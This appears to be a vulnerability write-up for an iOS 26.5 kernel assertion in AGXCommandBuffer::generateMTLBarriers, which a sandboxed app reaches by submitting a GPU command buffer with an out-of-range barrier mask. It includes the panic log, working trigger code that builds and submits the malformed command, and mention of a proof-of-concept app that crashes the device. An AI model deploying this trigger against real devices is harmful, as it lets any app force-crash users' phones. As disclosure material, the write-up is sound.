AGX Barrier-Mask Panic

Device: iPhone 17 Pro (iPhone18,1)
OS: iOS 26.5 RC 2 (23F77) — XNU 25.5.0 xnu-12377.122.4~1
Class: Reachable kernel assertion
Apple response: Not a security vulnerability


Bug

AGXCommandBuffer::generateMTLBarriers (agxk_command_buffer.cpp:996) fires a kernel panic assertion when it encounters an out-of-range barrier stage mask. The mask comes directly from a user-supplied kind-2 command stream submitted via IOGPUDeviceUserClient selector 25 (SubmitCommandBuffers). The parser does not reject the invalid mask before generateMTLBarriers sees it.

panic(cpu 0 caller 0xfffffe004887d6e4): AGXk:
agxk_command_buffer.cpp:996:void AGXCommandBuffer::generateMTLBarriers(uint32_t, uint32_t):
!!! Incorrect barrier stage information for CommandBuffer 0xfefffe197e1a6800
fStateIndex 1 src_mask 1024 dst_mask 0

src_mask 1024 is 0x400. The valid mask presumably covers bits 0–9; bit 10 (0x400) is not a recognized stage and triggers the assertion instead of a clean rejection.


Trigger path

Any sandboxed app can reach this. No entitlements beyond a normal installed app.

// Set barrier_src_mask = 0x400 in both the outer record and kind-2 inline payload
StoreU32(command, kAGXSecondParserRecordOffset + kAGXOuterBarrierSrcMaskRecordOffset, 0x400);
StoreU32(command, kAGXKind2InlineOffset + kAGXKind2BarrierSrcMaskInlineOffset, 0x400);
StoreU32(command, kAGXKind2InlineOffset + kAGXOptionalResource0InlineOffset, 0xffffffff);
StoreU32(command, kAGXKind2InlineOffset + kAGXOptionalResource1InlineOffset, 0xffffffff);
StoreU32(command, kAGXKind2InlineOffset + kAGXOptionalResource2InlineOffset, 0xffffffff);

// selector 25: SubmitCommandBuffers
uint64_t submitScalars[] = {queueID, 0, 1, kAGXCommandBufferArgSize};
IOConnectCallMethod(connection, kIOGPUSelectorSubmitCommandBuffers,
                    submitScalars, 4,
                    submitArg, sizeof(submitArg),
                    &submitStatus, &submitStatusCount,
                    NULL, NULL);
// kernel panics before this returns

PoC

poc/ is an iOS Xcode project. Build for a physical device running iOS 26.5, install, and tap Trigger AGX Barrier. The device will panic within a second.

panic-full-2026-05-10-151511.0002.ips is the captured panic log from the test device.


Notes

The bug is a missing bounds check, not a memory-safety issue. The kernel asserts rather than corrupting memory, which is why Apple closed it as not a security vulnerability. The assertion is nonetheless reachable from an unprivileged sandbox, so any app can reliably crash the device.
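As an added illustration of the bounds check the Bug and Notes sections describe as missing (example code, not this repository's PoC and not Apple's parser): a parser-side validation that rejects out-of-range barrier stage masks before anything like generateMTLBarriers would see them. It assumes, as inferred above, that valid stage bits are 0–9 (so 0x400 fails), and the record layout, offsets and names are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>

/* Constructed example, not Apple's code. Assumes, as the write-up infers, that
 * valid barrier stage bits are 0-9, so any bit at position 10 or above (0x400
 * in the panic log) must be rejected by the parser, not asserted on later. */
#define AGX_STAGE_BIT_COUNT   10u
#define AGX_VALID_STAGE_MASK  ((1u << AGX_STAGE_BIT_COUNT) - 1u)   /* 0x3ff */

/* Hypothetical minimal barrier record as it might appear in a command stream:
 * two little-endian u32 fields. Offsets are constructed for this example. */
#define BARRIER_RECORD_SIZE   8u
#define BARRIER_SRC_OFFSET    0u
#define BARRIER_DST_OFFSET    4u

static uint32_t load_u32_le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 1 when both masks use only recognised stage bits, 0 otherwise. */
static int agx_barrier_masks_valid(uint32_t src_mask, uint32_t dst_mask)
{
    return (src_mask & ~AGX_VALID_STAGE_MASK) == 0 &&
           (dst_mask & ~AGX_VALID_STAGE_MASK) == 0;
}

/* Walks a buffer of barrier records. Returns -1 if every record is valid,
 * otherwise the index of the first record that must be rejected; a caller
 * would map that to an error such as kIOReturnBadArgument and drop the whole
 * submission instead of letting the kernel assertion fire. A trailing partial
 * record is also rejected rather than read past the end of the buffer. */
static long agx_check_barrier_records(const uint8_t *buf, size_t len)
{
    size_t n = len / BARRIER_RECORD_SIZE;
    for (size_t i = 0; i < n; i++) {
        const uint8_t *rec = buf + i * BARRIER_RECORD_SIZE;
        uint32_t src = load_u32_le(rec + BARRIER_SRC_OFFSET);
        uint32_t dst = load_u32_le(rec + BARRIER_DST_OFFSET);
        if (!agx_barrier_masks_valid(src, dst))
            return (long)i;
    }
    if (len % BARRIER_RECORD_SIZE != 0)
        return (long)n;           /* truncated record: reject too */
    return -1;
}
```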

The kernel extension in the backtrace is com.apple.iokit.IOGPUFamily 130.14.

About

AGXCommandBuffer::generateMTLBarriers reachable kernel assertion via out-of-range barrier mask — iOS 26.5 (23F77)
